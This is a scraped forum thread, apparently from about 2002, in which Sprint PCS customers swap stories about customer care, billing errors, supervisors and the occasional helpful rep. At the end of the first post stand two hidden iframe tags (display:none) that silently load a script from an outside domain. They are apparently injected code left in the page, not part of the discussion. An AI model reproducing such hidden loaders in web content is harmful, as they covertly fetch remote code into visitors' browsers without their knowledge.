+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Thread: Customer Care

Customer Care

I called CC today to change my plan and was amazed. For the first time in 4 years, after asked to type my number and then password, I wasn't asked to repeat it by the rep. They took care of me in a timely fashion, difused a small problem I had with my voice command, and went as far to give me a tracking number for my problem. The number had a special name. Very responsive, very professional, and overall very reassuring my money is well spent.

Anyone else?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

you're talking about SPRINT customer care!? well, i am happy that you have received good service from them. In my 3 years with Sprint, the service has gone sharply downhill the day after i signed up with them. Countless numbers of errors, overcharges, and rude customer service. My last run in with customer care was due to another phone on my account not able to access the voice command features on the website, and they promised to return my call within 72 hours. It has been over 15 days now and still no response. I simply dont have the time/patience to deal with them that much any longer.

Administrator

Arrow

yeah mj i have had some nice calls.. even thuogh i dont call them much at all... they have gotten worse over the years (started going downhill when they released the WW for the first time in '99), but in the last few months, the service i have gotten form them has been remarkably better.. perhaps the learning curve has been "learned"!

being a new Sprint customer, (switched due to the I 300) I rhought AT&T was bad with billing isues. I have now met the most incompetent, rude people on this earth with Sprint!
    In my 1st month of service, I have logged 4 phone calls totaling almost 6 hrs trying to to correct their billing errors. I went from bas to worse!

How is that possible Robert? Were you on hold a great deal of time? Last summer I faced wait times upwards of an hour or so. It seems that they've recently cut 24 hour service in an attempt to provide more reps during the day. I think Marc brings up a good point that with this forum in place, CC should be a last resort. I hardly ever call either and subsequently am not subject to their blunders.

my problem started with their customer care agent attempting to assign me a pre fix before asking my preferences. She assigned a 310 area code while I live within a 562 area code. When I fianlly had to DEMAND a 562 prefix I was charged on my first bill for an early termination of a 310 phone number.

On the third day of my phone ownership I recieved a bill for $337.00 !

It took 3 or 4 very long phone calls ( min of one hr each ) to try to get a credit for their stupidity. They said check, it would be corrected on line within 12 hours

as of last night, it still wasnt corrected. I told them to start paying me for MY TIME!

Each time I called I owed a differnt amount than posted of the website Three diifernt pages gave me three different balances.

Go figure.

...asked to speak to a sup yet?

Every phone call starts with " Lets stop the B.S. give me to the #1 person in charge" at the time. Doesnt matter, #1 is just the least ignorant on duty!

I would probably stick with the lower people there. The higher you go, the more strict they become about policies, and when someone lower promised and allowed something in your favor, the higher up person will see that and take that away from you. This happened to me. I mostly call because of billing issues. A lot of my friends here have Sprint, and ALL have had erroneous charges and such billed to them, forcing them to call, while having service shut off in the meantime until Sprint finally realized it was their own mistake. I agree with teh AT&T billing problems, as our long distance carrier is AT&T and we almost filed a lawsuit to recover charges that we did not owe (on top of that, AT&T admitted their mistake MANY months later, but still had the collection agency harrassing us). Sprint is nowhere near being a "good" customer service company, and I think they really dont care that much as nothing major is being done about it. I dont know of a phone carrier company that has reportedly good, and thats CONSISTENTLY good customer service. I may have to disagree about the wait time issue...the long waits were a thing of the past, like 2 years ago, but lately, I usually get through somewhat quickly. I would say, expect to wait to speak with someone, as almost ALL company's customer service operators take a lot of time/patience to speak to. As you can see, as much as I despise calling Sprint cc advocates, i have learned to live with it. I have invested almost 1000 dollars in three cellular phones for use on Sprint's network, so I'm basically stuck with them.
    Last edited by Stillen_I30; 01-18-2002 at 02:45 AM.

I agree that Sprint PCS CS blows big time. As silly as this sounds, I have had some success by being sweet as can be, making jokes, and often repeating the reps name.

"Laticia, I really appreciate all the time you are spending with me. I wish my wife was so patient. or Laticia, you are far and away the nicest Sprint rep I have ever spoken to."

Believe it or not, this does work. I got a nice credit on my bill without putting up a fight. Granted, I believed I was entitled to it, but there have been many times I felt I was entitled to it, and they basically told me where I could go....

HTH....

Craig
    I thought grafitti was illegal?

Thats true. Whomever the new reps are that are hired to steer Sprints CC in the right direction is up for a difficult task. Everyone calling in has a 3 year chip on their shoulder. That must bring them down a bit.

Thumbs down

I was really surprised by the way how they behaved so rude with their customers...absolutely no courtesy and professionalisam

SPRINT CUSTOMER SERVICE not very inspiring

Well im not exactly off to a good start with these guys. Maybe im just spoiled with the service from the Lexus dealer.

I activated my I300 2 days ago. I was billed the $34.99+the service plan. Fine. I understand this so far.
    I buy another phone-the N200-for the lady to take advantage of the Add A Phone for 10.00 a month, so both phones are on the same plan.
    The website does not facilitate this so I had to call in.
    Uh Oh. This is where Rod Serling comes in.
    The lady (used loosely) gets on the phone and explains to me that I will be double charged this month for changing the plan. Adding the Add-A-Phone apparently changes your entire plan. Fine-I can deal with this ,however what is up with the DOUBLE BILLING?
    I ask her to explain. Her response,"You are billed a month in advance,so the new plan will be billed one month in advance along with your old plan that has already been billed".????????
    HUH????
    Even though both phones will utilize the same plan I still have to pay for the other plan,though im canceling it and replacing it with the new plan?YES.
    This went on for 6 minutes to no avail.

Supervisor time.

Let me speak to a supervisor,maybe he can explain this to me.
    Her response,"This is not a supervisor issues,so I don't know if one will help you but hold on and I will check".?????
    HUH????
    7 MINUTES LATER-I swear she is playing me.

Supervisor gets on the phone:
    He goes on in a rushed and rude manner that I will be getting credit for the unused days for the existing plan and will be billed for the 2 days used.
    Hey,I can understand this, why didn't the lady explain that I would be getting credit.
    His response, "I dunno, but I got to go, IM OFF FOR THE DAY, I will transfer you back to her to complete this".
    8 MINUTES LATER-I know she is playing me by now
    She gets on the phone with an ATTITUDE FROM HELL and completes the order.
    Is this what you guys go through with these people? Absolutely incomprehensible.

This is almost as bad as when I went to UPS to pickup my new laptop/mp3 player and the counter clerk gave me 2 boxes that had my name on the will call ticket yet one of the boxes belonged to someone else 25 miles away and was a complete 2gig system. I called UPS from the house to explain and they told me that they would not take it back because I signed for it????Once I sign for it,it's MINE,she told me! I could of had two computers. I delivered it myself.

Strange week. Need to hit the Wild Turkey bottle.
    See ya

DAMN! I've never had it so bad friend. I don't think. I try to forget their attitudes and leave them in their misery. If you run a search you'll see that I do rant on them about once a month though.

*What I've found is that a lot of these reps are ill-equipped for the reasoning sometimes required to diffuse even simple concerns. Kind of like when I was having trouble getting my RCN services installed. They ended up offering me the first month of service free. When I received the bill, they had in fact billed me for the first month. I called and spoke to a nice guy who credited the account, but I then noticed the cycle had begun a week before I had service. This nice rep who was not equipped with the logic capabilities necessary could not understand that I was now only getting 3 weeks free service. Took me a while to explain.

*What I finally realized is that it wasn't his fault, just like its not the "lady's" fault. Someone is hiring them and not holding them accountable for their poor service.

Correct

Thank you . I agree 100% with your comments. It is one thing to hire, but completely another issue to "properly" train an employee. I could not even count the times a well informed employee could of made my life so much easier is various aspects of life from different companies.
    Hopefully I will not have to call them anytime soon. Im already having Cingular flashbacks.

I went through this same thing when I wanted to change my two-year-old contract to add another feature. They told me that they could only do it at the end of the monthly cycle. It was kind of crazy and I even talked to a supervisor about it. She couldn't do anything for me either.

Well you usually have one of two things when you call. You either get a friendly person who doesn't know what the hell they are doing, or you get a smart person who is burned out on dealing with a lot of the idiots who call in. If you ever want to get a good idea of the intellect of the general public,,, just go to work at a radio shack somewhere. They will drive you nuts.

Companies like Sprint PCS, DirecTV, Cable company, etc, etc, etc get so many calls every day from customers wanting to change things over and over again that when they get a call from someone who hasn't changed anything in years you still get treated like a moron.

Times like this are when you just gotta take a deep breath and get on with it. Sort of a Zen thing I guess.

Good luck with your I300, you're gonna love it.
    Let he who is without sin cast the first stone.

OUCH!!!

ahh... another GS400 owner.....

Brooks

Administrator

Arrow

RE: sprint cs..

get over it.. it will happen again.. just rememebr, you have your friends here...

Talking Pleasant Surprise

For the first time EVER, I had a good experience with Sprint CS yesterday.

I called *4 to check on my usage and found out I was over. This was surprising to me because it indicated I still had 115 minutes left. Well I called CS, and I explained that I had been checking regularly since this was the first month I had been using wireless web. I wanted to make sure I didn't go over. Well apparently I was confused about the information the web site was providing me and I was in fact over my anytime minutes.

In the end the CS rep ended up giving me 60 extra minutes for the remainder of my billing cycle. I thought this was quite generous of them, since they could have told me it was my mistake and to screw off.

That is the first time, ever, that I have gotten off the phone with Sprint CS, and been happy. It certainly doesn't usually happen that way.

Laurie

Good

Glad to hear of your experience. There is good in any organization, you just have to find it. Hopefully my experience will be the exception and not the rule.Lee